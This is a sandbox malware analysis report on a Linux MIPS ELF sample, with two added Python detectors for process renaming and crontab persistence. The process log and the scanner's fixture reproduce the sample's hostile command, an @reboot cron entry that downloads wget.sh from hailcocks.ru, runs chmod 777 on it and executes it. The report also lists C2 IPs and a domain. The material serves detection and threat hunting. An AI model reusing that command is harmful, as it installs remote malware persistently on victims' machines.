Malware Analysis Report

2024-11-13 15:54

Sample ID 241027-cv1n3stbnp
Target 5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb.elf
SHA256 5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb
Tags
defense_evasion discovery execution persistence privilege_escalation
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb

Threat Level: Shows suspicious behavior

The file 5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb.elf was found to show suspicious behavior.

Malicious Activity Summary

defense_evasion discovery execution persistence privilege_escalation

File and Directory Permissions Modification

Renames itself

Unexpected DNS network traffic destination

Creates/modifies Cron job

Changes its process name

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-27 02:24

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-27 02:24

Reported

2024-10-27 02:27

Platform

debian9-mipsbe-20240611-en

Max time kernel

143s

Max time network

140s

Command Line

[/tmp/5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb.elf]

Signatures

File and Directory Permissions Modification

defense_evasion
Description | Indicator | Process | Target
N/A         | N/A       | /bin/sh | N/A

Renames itself

Description | Indicator | Process                                                                    | Target
N/A         | N/A       | /tmp/5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb.elf | N/A

Unexpected DNS network traffic destination

Description    | Indicator     | Process | Target
Destination IP | 70.34.254.19  | N/A     | N/A
Destination IP | 185.181.61.24 | N/A     | N/A

Creates/modifies Cron job

execution persistence privilege_escalation
Description                  | Indicator                           | Process          | Target
File opened for modification | /var/spool/cron/crontabs/tmp.dQCYhx | /usr/bin/crontab | N/A

Changes its process name

Description                                                     | Indicator                | Process                                                                    | Target
Changes the process name, possibly in an attempt to hide itself | /bin/sh, /etc/init.d/rcS | /tmp/5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb.elf | N/A
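A practical check for this signature, added here as an example and not part of the sandbox report: a process that rewrote its own name (for instance via prctl(PR_SET_NAME) or by overwriting argv[0]) no longer has a /proc/<pid>/comm that derives from the basename of /proc/<pid>/exe. A naive comparison produces false positives for symlinked interpreters (/bin/sh resolving to /usr/bin/dash legitimately shows comm "sh"), so the heuristic below only fires when the mismatching binary lives in a world-writable directory or has already been unlinked, which is where this sample's executable sits. The process snapshot, the pids and the directory list are constructed for the example.

```python
"""Heuristic for the 'Changes its process name' signature.

Added example, not part of the sandbox report. Inputs mirror what
/proc/<pid>/comm and /proc/<pid>/exe expose; the snapshot below is constructed.
"""
import os

TASK_COMM_LEN = 15          # the kernel keeps at most 15 bytes of a task name
DELETED = " (deleted)"      # suffix /proc/<pid>/exe carries once the binary is unlinked
# Assumption: directories where a dropper may live but a system daemon should not.
UNTRUSTED_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/run/user/")


def expected_comm(exe: str) -> str:
    """comm the kernel assigns at execve: basename of the path, truncated to 15 bytes."""
    return os.path.basename(exe)[:TASK_COMM_LEN]


def suspicious_rename(comm: str, exe: str) -> bool:
    """True when comm was most likely rewritten to a decoy name.

    comm derives from the basename of the filename passed to execve, so a
    symlinked interpreter (/bin/sh -> /usr/bin/dash) legitimately shows
    comm 'sh' with exe '/usr/bin/dash'. To avoid flagging that, the check
    only fires when the real binary is in an untrusted directory or is gone.
    """
    unlinked = exe.endswith(DELETED)
    exe_path = exe[:-len(DELETED)] if unlinked else exe
    if comm == expected_comm(exe_path):
        return False
    return unlinked or exe_path.startswith(UNTRUSTED_DIRS)


def scan(procs):
    """procs: iterable of (pid, comm, exe) tuples. Returns the pids flagged."""
    return [pid for pid, comm, exe in procs if suspicious_rename(comm, exe)]


# Constructed snapshot modelled on the detonation: the sample presents itself
# as /bin/sh and /etc/init.d/rcS while its executable stays under /tmp.
SAMPLE = "/tmp/5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb.elf"
SNAPSHOT = [
    (1,    "init",            "/sbin/init"),
    (212,  "systemd-journal", "/usr/lib/systemd/systemd-journald"),  # truncated, benign
    (640,  "sh",              "/usr/bin/dash"),                      # symlinked shell, benign
    (1337, "sh",              SAMPLE),
    (1340, "rcS",             SAMPLE + DELETED),
]

if __name__ == "__main__":
    for pid in scan(SNAPSHOT):
        print(f"pid {pid}: comm/exe mismatch on an untrusted or unlinked binary")
```

Run against a live host by filling the tuple list from /proc/<pid>/comm and os.readlink('/proc/<pid>/exe'); kernel threads have no exe and should be skipped before calling scan().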

Reads runtime system information

discovery
Description             | Indicator         | Process                                                                    | Target
File opened for reading | /proc/filesystems | /usr/bin/crontab                                                           | N/A
File opened for reading | /proc/filesystems | /usr/bin/crontab                                                           | N/A
File opened for reading | /proc/mounts      | /tmp/5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb.elf | N/A

Processes

/tmp/5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb.elf

[/tmp/5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb.elf]

/bin/sh

[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]
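The sh -c line above is the whole persistence mechanism: the sample appends an @reboot entry to the existing crontab (crontab -l ; echo ...) | crontab - that changes into /tmp, fetches wget.sh with wget or curl, makes it executable and runs it. The scanner below is an added example, not part of the sandbox report: it parses crontab -l output and flags entries that combine several of those traits, so a legitimate @reboot service start alone is not reported. The crontab text is constructed; the hailcocks.ru URL is the one from the report's command line, and the trait list and threshold are the example's own choices.

```python
"""Scan `crontab -l` output for the download-and-run persistence pattern above.

Added example, not part of the sandbox report. SAMPLE_CRONTAB is constructed:
line 3 mirrors the @reboot entry the sample installs; the other entries are
benign and show what must not be flagged.
"""
import re
from dataclasses import dataclass

SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh
*/5 * * * * /usr/bin/python3 /opt/metrics/collect.py
"""

URL_RE = re.compile(r"https?://[^\s;\"'|&]+")
DOWNLOADER_RE = re.compile(r"\b(?:wget|curl|tftp|ftpget)\b")
CHMOD_RE = re.compile(r"\bchmod\s+(?:[0-7]{3,4}|[ugoa]*[+=][rwxXst]+)\s")
# A relative-path execution right after a command separator, e.g. "; ./wget.sh".
RELATIVE_EXEC_RE = re.compile(r"(?:^|[;&|]\s*)\./\S+")
TMP_DIRS = ("/tmp", "/var/tmp", "/dev/shm")


@dataclass
class Finding:
    line_no: int
    schedule: str
    urls: list
    reasons: list


def split_entry(line):
    """Return (schedule, command) for a crontab line; None for blank, comment or VAR=value lines."""
    s = line.strip()
    if not s or s.startswith("#") or re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", s):
        return None
    if s.startswith("@"):                      # @reboot, @daily, ...
        parts = s.split(None, 1)
        return (parts[0], parts[1]) if len(parts) == 2 else None
    parts = s.split(None, 5)                   # five time fields, then the command
    if len(parts) < 6:
        return None
    return " ".join(parts[:5]), parts[5]


def score_command(schedule, command):
    """Collect the traits that, together, describe a download-and-run persistence entry."""
    reasons = []
    if schedule == "@reboot":
        reasons.append("runs at every boot (@reboot)")
    urls = sorted(set(URL_RE.findall(command)))
    if urls and DOWNLOADER_RE.search(command):
        reasons.append("fetches a remote payload with wget/curl")
    if CHMOD_RE.search(command):
        reasons.append("changes file permissions (chmod) in the same entry")
    if any(d in command for d in TMP_DIRS):
        reasons.append("works out of a world-writable temp directory")
    if RELATIVE_EXEC_RE.search(command):
        reasons.append("executes a just-written file by relative path")
    return urls, reasons


def scan_crontab(text, min_reasons=3):
    """Flag entries showing at least `min_reasons` traits (threshold is the example's choice)."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        entry = split_entry(line)
        if entry is None:
            continue
        schedule, command = entry
        urls, reasons = score_command(schedule, command)
        if len(reasons) >= min_reasons:
            findings.append(Finding(n, schedule, urls, reasons))
    return findings


if __name__ == "__main__":
    for f in scan_crontab(SAMPLE_CRONTAB):
        print(f"line {f.line_no} [{f.schedule}] {', '.join(f.urls)}")
        for r in f.reasons:
            print("  -", r)
```

On a live host feed it the output of crontab -l -u <user> for every user, plus the files under /var/spool/cron/crontabs/ and /etc/cron.d/ (the latter carry an extra user field after the schedule, which split_entry does not handle as written). The URLs in each Finding are the IOCs to block and hunt for.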

Network

Country | Destination         | Domain                | Proto
PL      | 70.34.254.19:53     | kingstonwikkerink.dyn | udp
NO      | 185.181.61.24:53    | kingstonwikkerink.dyn | udp
NO      | 81.29.149.178:22394 | kingstonwikkerink.dyn | tcp

Files

/var/spool/cron/crontabs/tmp.dQCYhx

MD5 f3ce9d7a4a91e5fd83d71554c65e28dd
SHA1 92f5357290d7c8b4d7f31552e22f6c0c7b2c1248
SHA256 31a0a02ee271e3d7233ac8ae401cb0b9c0561f6604e18077d4a1d5892616e1cf
SHA512 11e5be7af45d81b7aec59b576cb46621f9c9d290cd8b2e619c777400ae8a2d9452d0c0e97662f5043e1d6622292100f3f20e69b747eb829288211544f597e2b0